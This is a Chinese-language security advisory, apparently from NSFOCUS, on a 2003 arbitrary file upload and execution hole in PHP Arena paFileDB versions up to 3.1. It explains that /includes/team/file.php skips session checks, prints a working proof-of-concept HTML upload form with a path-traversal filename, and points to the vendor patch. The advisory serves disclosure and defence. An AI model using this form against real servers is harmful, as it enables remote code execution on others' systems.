安全研究

安全漏洞
PHP Arena paFileDB任意文件上传和执行漏洞

发布日期:2003-07-24
更新日期:2003-07-30

受影响系统:
PHP Arena paFileDB 3.1
PHP Arena paFileDB 3.0 Beta 3.1
PHP Arena paFileDB 3.0
PHP Arena paFileDB 2.1.1
PHP Arena paFileDB 1.1.3
描述:
BUGTRAQ  ID: 8271

paFileDB是一款设计用于管理员上传文件的服务程序。

paFileDB不正确验证上传文件的用户信息,远程攻击者可以利用这个漏洞上传任意文件到系统并执行。

"/includes/team/file.php"脚本没有检查合法会话,因此通过更改表单参数,可以上传任意文件到系统中,并直接请求以WEB进程权限执行包含在恶意文件中的命令。

<*来源:Martin Eiszner (security@freefly.com
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=105906835422386&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

---*---
<html><body>
<form ENCTYPE="multipart/form-data" method="POST" \
action="http://srv/pafiledb/includes/team/file.php"> <input name="userfile" \
TYPE="file"><br> <input name="userfile_name" TYPE="text" \
value="../../../uploads/makeawish"><br> <input type="hidden" name="action" \
value="team"> <input type="hidden" name="tm" value="file">
<input type="hidden" name="file" value="upload">
<input type="hidden" name="upload" value="do">
<input type=submit name=submit value="doit">
</form>
</body></html>
---*---

建议:
厂商补丁:

PHP Arena
---------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

PHP Arena Upgrade paFileDB Version 3.1
http://www.phparena.net/downloads/pafiledb.php?action=file&id=16

浏览次数:3792
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障